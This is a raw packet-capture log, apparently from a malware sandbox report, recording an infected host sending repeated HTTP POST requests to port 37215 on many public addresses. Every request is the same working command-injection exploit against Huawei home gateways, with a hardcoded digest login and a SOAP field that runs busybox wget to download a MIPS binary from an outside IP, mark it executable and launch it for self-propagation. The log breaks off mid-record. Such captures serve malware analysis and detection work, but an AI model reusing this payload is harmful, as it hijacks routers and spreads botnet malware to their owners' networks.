                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  949192.168.2.1351130197.61.15.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448620081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  950192.168.2.133555841.137.88.25437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448873997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  951192.168.2.1333288157.236.120.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448918104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  952192.168.2.1356298157.122.165.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448973894 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  953192.168.2.1351444126.165.134.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.448987961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  954192.168.2.1350734157.179.62.13437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449003935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  955192.168.2.1345846197.116.193.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449336052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  956192.168.2.1344718157.138.197.23937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449667931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  957192.168.2.134217041.141.112.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449690104 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  958192.168.2.1333142197.109.248.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.449702978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 